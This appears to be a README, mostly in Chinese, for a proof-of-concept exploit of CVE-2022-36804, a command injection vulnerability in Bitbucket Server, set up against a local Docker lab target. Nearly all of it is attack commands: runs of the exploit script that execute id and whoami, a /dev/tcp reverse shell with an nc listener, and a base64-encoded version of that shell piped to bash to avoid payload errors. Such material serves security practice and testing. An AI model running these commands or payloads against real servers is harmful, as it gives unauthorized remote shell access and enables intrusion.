docker run -it bitbucket
python3 cve-2022-36804.py -u http://172.17.0.2:7990
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo
将 172.17.0.3 替换为你本地的 IP 地址
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "sh -i >& /dev/tcp/172.17.0.2/4444 0>&1"
nc -lvp 4444
https://www.revshells.com将 `sh -i >& /dev/tcp/172.17.0.2/4444 0>&1` 转换为 base64,以防止 payload 执行错误。
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE3LjAuMi80NDQ0IDA+JjE=' | base64 -d | bash"
建议在 Windows/Linux 机器上安装存在漏洞版本的 Bitbucket 服务器进行练习。与 Docker 镜像相比,这样更容易获得反向 shell。
更多信息请参阅[此处](https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/)
# 参考
* https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
* https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
* https://github.com/walnutsecurity/cve-2022-36804